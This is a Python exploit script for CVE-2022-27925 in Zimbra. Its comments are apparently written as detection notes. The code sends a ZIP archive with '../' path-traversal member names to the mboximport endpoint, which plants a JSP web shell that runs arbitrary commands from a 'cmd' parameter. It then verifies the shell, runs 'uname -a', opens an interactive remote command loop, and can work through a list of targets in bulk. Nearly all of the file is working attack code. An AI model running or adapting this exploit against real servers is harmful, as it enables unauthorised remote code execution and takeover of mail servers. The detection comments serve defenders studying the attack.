import argparse
import zipfile
import io
import random
import string
import requests
from urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's per-request warning for verify=False. Every request in this
# file disables TLS validation, so any certificate presented by the host is accepted.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# JSP page that passes request.getParameter("cmd") to Runtime.exec (prefixed with
# "cmd.exe /C" when os.name contains "windows") and echoes each stdout line after a
# "<div>" marker. A newly created .jsp of this shape under the zimbraAdmin webapp
# directory is the on-disk artifact to look for.
webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUTTYPE="submit" VALUE="Send"></FORM><pre><%if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<div>"); Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd")); } else{ p = Runtime.getRuntime().exec(request.getParameter("cmd")); } OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%><div></pre></BODY></HTML>'
# Dropped file name: six characters drawn from A-Z0-9 plus ".jsp", chosen once per
# run. The name is random, so it is not a stable indicator; alert on any new .jsp
# appearing in the webapp root rather than on a specific name.
char_set = string.ascii_uppercase + string.digits
webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp'
#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"]
# ANSI color prefixes for console output.
BLUE = "\033[1;34m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[31m"
# Module-level flag that nothing reads: main() assigns ITERATE without a
# `global` statement, which creates a function-local name instead.
ITERATE = False
def banner():
    """Return the cyan-colored ASCII-art banner, ending with the CVE id this script targets.

    The returned string starts with the CYAN escape sequence and is never reset,
    so subsequent console output inherits the color until another prefix is printed.
    """
    return CYAN+'''
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
'''
# FIX URL
def fix_url(url):
    """Normalize a target string into an ``https://`` base URL without trailing slashes.

    Args:
        url: Host or URL as typed on the command line or read from the list file.

    Returns:
        ``url`` prefixed with ``https://`` unless it already begins with exactly
        that scheme, then stripped of trailing ``/`` characters. Only the literal
        ``https://`` prefix is recognized, so an ``http://`` input is not rewritten
        but prefixed as-is.
    """
    scheme = 'https://'
    base = url if url.startswith(scheme) else scheme + url
    return base.rstrip("/")
def build_zip(jsp, path):
    """Return the bytes of an in-memory ZIP archive containing a single member.

    Args:
        jsp: Member contents; a ``str`` is encoded as UTF-8 by ``ZipFile.writestr``.
        path: Member name, written verbatim. No normalization is applied, so a
            name containing ``..`` segments is stored exactly as given -- an
            extractor has to canonicalize member names against its destination
            directory and reject any that resolve outside it.

    Returns:
        The complete archive as ``bytes`` (ZIP_STORED, the ``ZipFile`` default,
        since no compression is requested).
    """
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, 'w') as archive:
        archive.writestr(path, jsp)
    return buffer.getvalue()
def exploit(host, payload, cmd):
    """POST the ZIP to the mboximport endpoint, then probe for the dropped JSP.

    Args:
        host: Base URL (scheme + host, no trailing slash) as produced by fix_url().
        payload: ZIP archive bytes from build_zip().
        cmd: Command string appended to the ``cmd`` query parameter of the first
            probe; the success check looks for the literal marker "Josexv1" in
            the response regardless of what ``cmd`` is.

    Returns:
        True when the marker is found, False when it is not, and None (falsy)
        when any exception escapes -- the bare ``except`` swallows everything,
        including IndexError from the ``split`` parsing and programming errors.
    """
    headers = {'content-Type': 'application/x-www-form-urlencoded'}
    try:
        # First POST sends the archive to the bare host URL; its response is
        # overwritten on the next line and never inspected.
        r = requests.post(
            host + '', data=payload, headers=headers, verify=False, timeout=20)
        # Network detection point: POST to /service/extension/backup/mboximport
        # with account-name=admin&ow=2&no-switch=1&append=1 and a ZIP body.
        # TLS validation is disabled and the response status is never checked.
        r = requests.post(
            host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20)
        print(GREEN + '[!] Testing webshell')
        # Second detection point: GET for a fresh .jsp under /zimbraAdmin/ with a
        # ``cmd`` query parameter; ``cmd`` is concatenated straight into the URL.
        r = requests.get(host + '/zimbraAdmin/' + webshell_name +
                         '?cmd=' + cmd, verify=False, timeout=20)
        if "Josexv1" in r.text:
            print(CYAN + '[+] Webshell works!!')
            print(GREEN + '[+] WebShell location: ' +
                  host + '/zimbraAdmin/' + webshell_name + "")
            # Fixed follow-up request (?cmd=uname+-a) -- a second log line to
            # correlate with the one above when reconstructing activity.
            r = requests.get(host + '/zimbraAdmin/' + webshell_name +
                             '?cmd=uname+-a' , verify=False, timeout=20)
            # Output is the text between the first "<div>" and the following
            # "</div>"; raises IndexError (caught below) if "<div>" is absent.
            print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('<div>')
                  [1].split('</div>')[0].strip())
            return True
        else:
            print(RED + '[-] Target not vulnerable')
            return False
    except:
        # Any error (network, timeout, parsing) is reported as a connection
        # error and the function falls through returning None.
        print(RED + '[!] Connection error')
def ping_url(url):
    """Report whether ``url`` answers a GET with HTTP 200.

    A single GET is issued with TLS verification disabled and a 10 s timeout.

    Args:
        url: Base URL to probe.

    Returns:
        True on status 200 (prints "Target is up!"), False on any other status
        (prints "Target is down!") or on any exception, which is swallowed silently.
    """
    try:
        response = requests.get(url, verify=False, timeout=10)
        reachable = response.status_code == 200
        if reachable:
            message = CYAN + '[!] Target is up!'
        else:
            message = RED + '[!] Target is down! Next >> \n'
        print(message)
        return reachable
    except:
        return False
def main(url):
    """Try each candidate extraction path against ``url`` and stop at the first success.

    Args:
        url: Normalized base URL (see fix_url()); ping_url() is expected to have
            passed already.

    Relies on the module-level ``args`` assigned in the ``__main__`` block, so
    this function only works when the file is run as a script. Exits the
    process via ``exit()`` after a successful path; any exception reaching the
    outer ``try`` is reported as a URL error.
    """
    # Three relative member names, each climbing four directories before
    # descending into a zimbraAdmin webapp directory -- presumably covering
    # different install layouts (verify against the target version).
    paths = [
        '../../../../mailboxd/webapps/zimbraAdmin/',
        '../../../../jetty_base/webapps/zimbraAdmin/',
        '../../../../jetty/webapps/zimbraAdmin/']
    work = 0  # assigned but never used
    try:
        for num in range(0, 3):
            print(
                GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num])
            # Member name = traversal prefix + random .jsp name from module scope.
            zippedfile = build_zip(webshell_payload, paths[num]+webshell_name)
            print(GREEN + '[!] Exploiting!')
            # Marker command: exploit() checks the response for "Josexv1".
            if exploit(url, zippedfile, 'echo "Josexv1"'):
                # Interactive prompt only in single-target (-t) mode.
                if args.target:
                    answer = input(
                        CYAN + '[+] Want to interact with webshell via terminal? (y/n): ')
                    if answer == "y":
                        print(GREEN + '[!] Sending commands to: ' +
                              url + '/zimbraAdmin/' + webshell_name)
                        while True:
                            cmd = input(GREEN + "[+] $ > " + BLUE)
                            if cmd == "exit":
                                break
                            # Each command becomes one GET with ?cmd= on the
                            # dropped JSP; every one is a web-log line.
                            req = requests.get(
                                url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20)
                            try:
                                # Output sits between the first "<div>" and "</div>".
                                print(CYAN + req.text.split('<div>')
                                      [1].split('</div>')[0].strip())
                            except:
                                print(RED + "[!] Error ?")
                    else:
                        print(RED + '[!] Bye!')
                # NOTE(review): indentation was lost in this rendering; exit() is
                # assumed to sit at this level (end the run after the first
                # working path) -- confirm against the original file.
                exit()
    except:
        print(RED + '[!] URL Error')
    # Local assignment only (no `global`); the module-level ITERATE is unaffected.
    ITERATE = True
if __name__ == "__main__":
    print(banner())
    # Both options default to False (not None) and the branches below test
    # ``is not False``, so an explicitly empty string still selects a mode.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '-t', '--target', help='URl with protocol HTTPS', default=False)
    parser.add_argument("-l", "--list", action="store",
                        help="List of targets", default=False)
    # ``args`` is read as a module global inside main().
    args = parser.parse_args()
    if args.target is not False:
        # Single-target mode: normalize, check reachability, then run.
        url = fix_url(args.target)
        print(GREEN + '[!] Testing URL: '+ url)
        if ping_url(url):
            main(url)
    elif args.list is not False:
        # List mode: one target per line, read as bytes and decoded as UTF-8
        # after stripping trailing whitespace/newlines.
        with open(args.list, "rb") as targets:
            for target in targets:
                target = target.rstrip().decode("utf-8")
                url = fix_url(target)
                print(GREEN + '[!] Testing URL: '+ url)
                if ping_url(url):
                    main(url)
    else:
        parser.print_help()
        parser.exit()